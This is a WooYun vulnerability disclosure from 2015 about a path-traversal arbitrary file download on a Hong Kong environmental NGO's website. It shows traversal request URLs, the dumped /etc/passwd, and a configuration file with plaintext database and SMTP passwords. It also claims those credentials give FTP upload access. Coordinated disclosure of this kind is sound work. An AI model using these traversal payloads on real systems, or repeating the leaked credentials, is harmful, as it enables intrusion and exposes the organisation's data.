当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158401

漏洞标题:香港长春社任意文件下载(香港地區)

相关厂商:香港长春社

漏洞作者: 路人甲

提交时间:2015-12-05 23:26

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

Hello,hkcert香港互联网应急协调中心~

详细说明:

下载点:

http://**.**.**.**/downproject.php?u=../../../../../../../../../../../etc/passwd


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
www:x:80:80::/home/www:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
vizz:x:507:509::/home/vizz:/bin/bash
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
myiconlight:x:103:80:**.**.**.**:/export/web/myiconlight:/sbin/nologin
mysql:x:508:508::/usr/local/mysql:/sbin/nologin
gino:x:502:500::/export/web/gino:/bin/bash
swsd2010:x:2653:80::/export/web/swsd2010:/bin/sh
alias:x:2654:510::/var/qmail/alias:/sbin/nologin
qmaild:x:2655:510::/var/qmail:/sbin/nologin
qmaill:x:2656:510::/var/qmail:/sbin/nologin
qmailp:x:2657:510::/var/qmail:/sbin/nologin
qmailq:x:2658:511::/var/qmail:/sbin/nologin
qmailr:x:2659:511::/var/qmail:/sbin/nologin
qmails:x:2660:511::/var/qmail:/sbin/nologin
aster:x:2534:80:**.**.**.**:/export/web/aster:/bin/sh
wincalpharm:x:2860:80:**.**.**.**:/export/web/wincalpharm:/sbin/nologin
dejohk:x:2862:80:**.**.**.**:/export/web/dejohk:/sbin/nologin
worldlinkhk:x:2864:80:**.**.**.**:/export/web/worldlinkhk:/sbin/nologin
outdoorproducts:x:2867:80:**.**.**.**:/export/web/outdoorproducts:/sbin/nologin
joannshe:x:2869:80:**.**.**.**:/export/web/joannshe:/bin/sh
synergytechhk:x:2872:80:**.**.**.**:/export/web/synergytechhk:/sbin/nologin
keibert:x:2873:80:**.**.**.**:/export/web/keibert:/sbin/nologin
healthguardcn:x:2875:80:**.**.**.**:/export/web/healthguardcn:/sbin/nologin
colroot:x:2876:80:**.**.**.**:/export/web/colroot:/sbin/nologin
cm2square:x:2878:80:**.**.**.**:/export/web/cm2square:/sbin/nologin
damoorghk:x:2882:80:**.**.**.**:/export/web/damoorghk:/sbin/nologin
taicohk:x:2884:80:**.**.**.**:/export/web/taicohk:/sbin/nologin
sideways:x:2888:80:**.**.**.**:/export/web/sideways:/sbin/nologin
timwaytest:x:2889:80:**.**.**.**:/export/web/timwaytest:/sbin/nologin
freeformoptical:x:2893:80:**.**.**.**:/export/web/freeformoptical:/sbin/nologin
jollykingdom:x:2894:80:**.**.**.**:/export/web/jollykingdom:/sbin/nologin
angelgrace:x:2902:80:**.**.**.**:/export/web/angelgrace:/sbin/nologin
searcheasy:x:2903:80:**.**.**.**:/export/web/searcheasy:/sbin/nologin
heijkoopinvest:x:2906:80:**.**.**.**:/export/web/heijkoopinvest:/sbin/nologin
cedhk:x:2912:80:**.**.**.**:/export/web/cedhk:/sbin/nologin
chinapromotion:x:2917:80:**.**.**.**:/export/web/chinapromotion:/bin/sh
chikahk:x:2918:80:**.**.**.**:/export/web/chikahk:/sbin/nologin
gianna:x:2927:80:**.**.**.**:/export/web/gianna:/sbin/nologin
biegoinc:x:2929:80:**.**.**.**:/export/web/biegoinc:/sbin/nologin
nexsos:x:2932:80:**.**.**.**:/export/web/nexsos:/sbin/nologin
pontitdg:x:2934:80:**.**.**.**:/export/web/pontitdg:/sbin/nologin
gowingroup:x:2935:80:**.**.**.**:/export/web/gowingroup:/bin/sh
iskydesign:x:2941:80:**.**.**.**:/export/web/iskydesign:/sbin/nologin
talentfocushk:x:2942:80:**.**.**.**:/export/web/talentfocushk:/sbin/nologin
taihingproducts:x:2944:80:**.**.**.**:/export/web/taihingproducts:/sbin/nologin
nasonpearl:x:2946:80:**.**.**.**:/export/web/nasonpearl:/sbin/nologin
miyabihk:x:2947:80:**.**.**.**:/export/web/miyabihk:/bin/sh
vizzpromotion:x:2948:80:**.**.**.**:/export/web/vizzpromotion:/sbin/nologin
mppromo:x:2954:80:**.**.**.**:/export/web/mppromo:/sbin/nologin
nashkhk:x:2955:80:**.**.**.**:/export/web/nashkhk:/sbin/nologin
phonebuytest:x:2956:80:**.**.**.**:/export/web/phonebuytest:/sbin/nologin
tonwell:x:2958:80:**.**.**.**:/export/web/tonwell:/sbin/nologin
rhemaengineer:x:2959:80:**.**.**.**:/export/web/rhemaengineer:/sbin/nologin
shundatest01:x:2964:80:**.**.**.**:/export/web/shundatest01:/sbin/nologin
pretterior:x:2965:80:**.**.**.**:/export/web/pretterior:/bin/sh
pressroom01:x:2966:80:**.**.**.**:/export/web/pressroom01:/sbin/nologin
tastefulbeers:x:2967:80:tastefulbeers.biz:/export/web/tastefulbeers:/sbin/nologin
northwing:x:2969:80:**.**.**.**:/export/web/northwing:/sbin/nologin
uarm:x:2970:80:**.**.**.**:/export/web/uarm:/sbin/nologin
chunkeehk:x:2971:80:**.**.**.**:/export/web/chunkeehk:/sbin/nologin
mesadahk:x:2974:80:**.**.**.**:/export/web/mesadahk:/sbin/nologin
jobsasap:x:2975:80:**.**.**.**:/export/web/jobsasap:/sbin/nologin
phplisttest:x:2976:80:**.**.**.**:/export/web/phplisttest:/bin/sh
heltexfashion:x:2980:80:**.**.**.**:/export/web/heltexfashion:/bin/sh
ambrosiacuisine:x:2982:80:**.**.**.**:/export/web/ambrosiacuisine:/bin/sh
pontiwinecell:x:2984:80:**.**.**.**:/export/web/pontiwinecell:/sbin/nologin
pontiwinesg:x:2985:80:**.**.**.**.sg:/export/web/pontiwinesg:/sbin/nologin
hktjq:x:2989:80:**.**.**.**:/export/web/hktjq:/bin/sh
...


下载点:

http://**.**.**.**/downproject.php?u=../../configs/config.inc.php


<?php
define("__SITE_ROOT", dirname(__FILE__) . '/..' );
define('__DATABASE_TYPE', 'mysql');
define('__MYSQL_HOST', 'localhost'); // Database Host
define('__MYSQL_USER', 'cahkorghk'); // Database User
define('__MYSQL_PASSWD', 'QqYDxbkN'); // Database Password
define('__MYSQL_DATABASE', 'cahkorghk'); // Database Name
// Database Table Prefix
define('__MYSQL_PREFIX_F', 'ca'); // Greenpower Database Table Prefix
define('__MYSQL_ENCODING', 'UTF8'); // Database Encoding
define('__TEMPLATE_DIR', __SITE_ROOT . '/templates');
define('__TEMPLATE_COMPILE_DIR', __SITE_ROOT . '/templates_c');
define('__TEMPLATE_CONFIG_DIR', __SITE_ROOT . '/configs');
define('__TEMPLATE_CACHE_DIR', __SITE_ROOT . '/cache');
define('__TEMPLATE_LEFT_DELIMITER', '<{');
define('__TEMPLATE_RIGHT_DELIMITER', '}>');
define('__DEBUG', '1');
define('__SESSION_TIMEOUT', '60');
/* Modified at 20070726 for New Web Hosting */
define('__SESSION_PATH', __SITE_ROOT . '/sessions');
/* End Modified at 20070726 for New Web Hosting */
define('__PAGE_SHOW', '15');
define('__PAGE_SET', '10');
define('__SITE_COMPANY', 'Greenpower Minisite');
define('__SITE_SYSTEM', 'Website Management System');
define('__SITE_TITLE', __SITE_COMPANY . ' - ' . __SITE_SYSTEM);
define('__SITE_LOGO', 'images/logo.jpg');
define('__VERSION', '');
define('__COPYRIGHT', 'Copyright &copy; '.date('Y').' all rights reserved.');
define('__POWEREDBY', '');
//define('__EMAIL_SUBJECT', 'Greenpower Minisite'); //�]�����}
//define('__EMAIL_SUBJECT_EN', 'Thank you for supporting !!');//Ӣ�İ��]�����}
define('__EMAIL_NAME', '長春社');//�l���˳ƺ�
// define('__EMAIL_FROM', 'sunsky@**.**.**.**');//�l����
//define('__EMAIL_FROM_PASSWORD', 'Sk6263#Sup');
// define('__EMAIL_SMTPSERVER', '**.**.**.**');//�l����
define('__SMTP_AUTH', false);
// define('__SITE_URL', 'http://**.**.**.**/7.14butterflytest');
//define('__SITE_URL', 'http://**.**.**.**/greenpower/7.14butterfly');
//define('__EMAIL_SENDER', 'project@**.**.**.**');
// define('__CHECK_AUTHORIZED_IP', 0);
?>


相同密码可登录ftp上传文件:

FTP root at **.**.**.**
To view this FTP site in Windows Explorer, click Page, and then click Open FTP Site in Windows Explorer.
--------------------------------------------------------------------------------
09/29/2015 08:38AM 876 Contactus.php
09/29/2015 08:38AM 1,082 Environmental.php
09/29/2015 08:38AM 886 Personal_Information.php
09/29/2015 08:38AM 879 Privacy_notice.php
10/09/2015 03:18AM 1,824 about.php
09/29/2015 08:38AM 888 activity_news_details.php
09/29/2015 08:38AM 1,067 activity_news_list.php
12/02/2015 04:12AM Directory admin2s
08/28/2015 11:03AM Directory class
08/28/2015 11:04AM Directory classes
12/01/2015 07:38AM 576 co.php
08/28/2015 11:04AM Directory configs
12/02/2015 09:46AM 99,561 connector.php
12/01/2015 07:30AM 28 connn.php
08/28/2015 11:04AM Directory css
09/29/2015 08:38AM 851 database.php
09/29/2015 08:38AM 819 donation.php
08/28/2015 11:04AM Directory download
09/29/2015 08:38AM 314 download_subscription.php
09/29/2015 08:38AM 950 downproject.php
08/28/2015 11:04AM Directory fancybox
09/25/2015 06:53AM Directory images
08/28/2015 10:05AM Directory includes
09/29/2015 08:38AM 1,196 index.php
09/29/2015 08:38AM 573 join.php
12/02/2015 04:56AM Directory js
...


以及网站后台管理页面:

QQ截图20151204221318.png


漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-09 16:07

厂商回复:

Referred to related parties.

最新状态:

暂无